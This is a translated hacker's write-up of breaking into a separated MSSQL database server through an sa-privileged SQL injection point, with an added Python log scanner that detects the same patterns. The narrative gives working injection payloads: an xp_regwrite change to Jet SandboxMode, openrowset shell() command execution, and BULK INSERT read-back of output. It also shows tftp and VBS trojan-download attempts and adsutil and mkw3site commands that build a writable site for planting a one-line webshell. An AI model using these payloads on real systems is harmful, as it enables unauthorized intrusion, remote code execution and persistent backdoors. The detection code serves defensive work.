Notes on a clever hack ~
By netpatch
That day I was reading through some material when a friend sent me a URL and said it was an injection point with sa privileges, but the database and the web server were separated and he hadn't managed to get anywhere with it for a long time.
As soon as I heard "sa injection point" I figured it would be easy, so I casually said OK, no problem, I'll get you a result ~
It really was an sa-level injection point; I won't write down how I confirmed that, the interesting part comes later.
Out came NBSI, the big knife. First I tried to restore the xp_cmdshell and sp_OACreate extended stored procedures. Once restored, I used them to run an arbitrary command, but judging from the returned result the command had not been executed.
So I restored the xp_servicecontrol extended stored procedure as well. Since these extended stored procedures return no output, I used them to ECHO a file into a known directory
and then used NBSI's directory-listing feature to list that directory, but no such file was found. I figured the administrator had killed off all the extended stored procedures commonly used for hacking.
Not knowing whether xp_regwrite had been killed too, I manually enabled sandbox mode:
asp?idx=32;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engines','SandboxMode','REG_DWORD',0;--
Then I tried ECHOing a file into the chosen directory through sandbox mode:
asp?idx=32 and 0<>(select * from openrowset('Microsoft.Jet.OLEDB.4.0',';database=c:\winnt\system32\ias.mdb','select shell("cmd /c echo xx > c:\xxx\xxx.txt")'))--
I listed the directory again with the directory-listing feature and there was the ECHOed file: the command had run! HOHO, luckily the administrator hadn't killed this one.
With a way to execute commands there was a glimmer of hope, so I immediately tried to upload with tftp: tftp -i ip get muma.exe c:\muma.exe. No result whatsoever.
My guess was that the administrator had restricted it or deleted tftp, so I wrote a one-line VBS downloader. After running it I waited a long time and still didn't see our trojan. Could it be that the box can't reach the Internet?
So I ran IPCONFIG and redirected its output into a temporary file, np.tmp. But I had no way to see the file's contents. How to get the database server's IP address? Hey, think about it: how does NBSI display query results?
We can do the same.
asp?idx=32;create table [NP_ICEHACK](ResultTxt nvarchar(1024) NULL)--   // create a table to hold the content we want to read back
asp?idx=32;bulk insert [NP_ICEHACK] FROM 'np.tmp' WITH (KEEPNULLS);insert into [NP_ICEHACK] values ('G_over');alter table [NP_ICEHACK] add id int not null identity(1,1)--   // load the temporary file np.tmp into the NP_ICEHACK table with BULK INSERT, append an end marker and add a row id so the lines can be read back in order
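As an added example (not from the original article), here is defender-side detection logic that scans IIS-style web log lines for the injected statements used above: the xp_regwrite change to the Jet SandboxMode key, the openrowset/Jet shell() call, the BULK INSERT read-back, and stacked exec of master..xp_* procedures. The log field order, the /show.asp path and the log lines themselves are constructed for this example.

```python
"""Flag the T-SQL/Jet abuse patterns from this write-up in IIS-style log lines.
Constructed example, not from the original article. Assumed field order:
date time c-ip cs-method cs-uri-stem cs-uri-query (query still URL-encoded, as IIS logs it)."""
import re
from urllib.parse import unquote_plus

# Detection signatures for the techniques the write-up relies on; each is applied
# to the decoded, lower-cased, whitespace-collapsed query string.
RULES = [
    ("xp_regwrite-jet-sandbox", re.compile(r"xp_regwrite.*jet.*sandboxmode")),
    ("openrowset-jet-shell", re.compile(r"openrowset\s*\(\s*'microsoft\.jet\.oledb.*shell\s*\(")),
    ("bulk-insert-readback", re.compile(r"bulk\s+insert\s+\[?\w+\]?\s+from\s+'")),
    ("xp_cmdshell", re.compile(r"xp_cmdshell")),
    ("stacked-query-exec", re.compile(r";\s*exec\s+master\s*\.\.\s*xp_\w+")),
]

def normalize(query):
    """Decode twice (catches double-encoded payloads), lower-case, collapse whitespace."""
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).lower()

def scan_line(line):
    """Return (c-ip, uri-stem, [matched rule names]) for a suspicious line, else None."""
    if line.startswith("#"):  # W3C directive lines such as #Fields
        return None
    parts = line.split(" ", 5)  # the whole query string stays in the last field
    if len(parts) < 6 or parts[5] == "-":
        return None
    query = normalize(parts[5])
    hits = [name for name, rx in RULES if rx.search(query)]
    return (parts[2], parts[4], hits) if hits else None

def scan_log(lines):
    """Scan every line and keep only the findings."""
    return [hit for hit in map(scan_line, lines) if hit]

# Constructed log lines modelled on the requests described in the article.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query",
    "2003-05-12 10:01:02 10.0.0.5 GET /show.asp idx=32",
    "2003-05-12 10:01:09 10.0.0.5 GET /show.asp idx=32;exec+master..xp_regwrite+'HKEY_LOCAL_MACHINE',"
    "'Software\\Microsoft\\Jet\\4.0\\Engines','SandboxMode','REG_DWORD',0;--",
    "2003-05-12 10:01:15 10.0.0.5 GET /show.asp idx=32+and+0<>(select+*+from+openrowset('Microsoft.Jet.OLEDB.4.0',"
    "';database=c:\\winnt\\system32\\ias.mdb','select+shell(\"cmd+/c+echo+xx>c:\\x\\x.txt\")'))--",
    "2003-05-12 10:01:40 10.0.0.5 GET /show.asp idx=32;create+table+[NP_ICEHACK](ResultTxt+nvarchar(1024)+NULL)--",
    "2003-05-12 10:01:44 10.0.0.5 GET /show.asp idx=32;bulk+insert+[NP_ICEHACK]+from+'np.tmp'+with+(keepnulls)--",
    "2003-05-12 10:02:00 10.0.0.7 GET /show.asp idx=%33%32%3b%65%78%65%63%20master..xp_cmdshell%20'dir'--",
]
```

Running `scan_log(SAMPLE_LOG)` flags four of the seven lines; the plain `idx=32` request and the bare `create table` statement produce no finding, which is why the read-back pattern is keyed on BULK INSERT rather than on table creation.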
Then I simply dumped the table with NBSI, and after a moment the lovely IP popped up in front of me. Next I fired up nmap and scanned it for a while, but the result was a bit unexpected: port 80 was open.
Wasn't the database supposed to be separated? PINGing the domain name gave a different IP from the database IP I had obtained. Whatever, visit the site first .. I immediately browsed to it by IP address.
Strange, a blank page! So I appended a random directory; still blank. Huh. This... nmap identified this port as IIS 5.0. Was it a false positive?
Think, and try again. But how? Hey: through sandbox mode I ran net stop w3svc (which stops the whole web service) and visited port 80 again. YES, the connection failed; even that depressing
blank page was gone. This looked promising, so I ran net start w3svc (start the web service) again, visited port 80 once more, and confirmed that no web site was configured for this address.
Ah, so there is a site bound to a domain name; couldn't I just add a virtual directory to it? I ran the following command to query the configured sites (increment the 1 to view the other sites):
cmd /c cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs GET W3SVC/1/ServerBindings
This shows the bindings of the first web site. W3SVC/1 is short for IIS://LocalHost/W3SVC/1, and ServerBindings is its property.
Reading the results back through NBSI the same way, I got to site 3 and found it bound to a domain name, so I ran the following commands to add a virtual directory:
cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs CREATE w3svc/3/Root/np "IIsWebVirtualDir"
cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/Path "C:\"
cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessRead 1
cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessWrite 1
cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessScript 1
cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/EnableDirBrowsing 1
cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessSource 1
Having added it, I happily visited that domain name...
and every request was forwarded to www.xxx.com??? So I set up a local test bed to check .. as expected, it forwards everything.
Unbelievable .. in that case .. after thinking for a while: "You don't want me visiting this site .. fine, I'll build my own site and see what you do about it. Hmph ~"
I immediately ran the following command:
cmd /c cscript c:\Inetpub\AdminScripts\mkw3site.vbs -r "c:\" -t "test" -c "LocalHost" -o "80" -h "netpatch.xx.com"
Then I pointed my own domain name at the database server's IP address and browsed to netpatch.xx.com. HOHO.
So I immediately ECHOed a one-liner in, and this hacking trip came to an end.
BTW: I actually ran into a lot of problems in this hack, looked up a lot of material and tested things N times on my own test bed; it wasn't as smooth as the article makes it look.
The difficulty was that the target only had port 80 open, forwarded only the web traffic, and could not reach the Internet.
____ By NetPatch www.icehack.com & [P.T.U]
If you reprint this, please keep the article complete. Thank you for your cooperation!
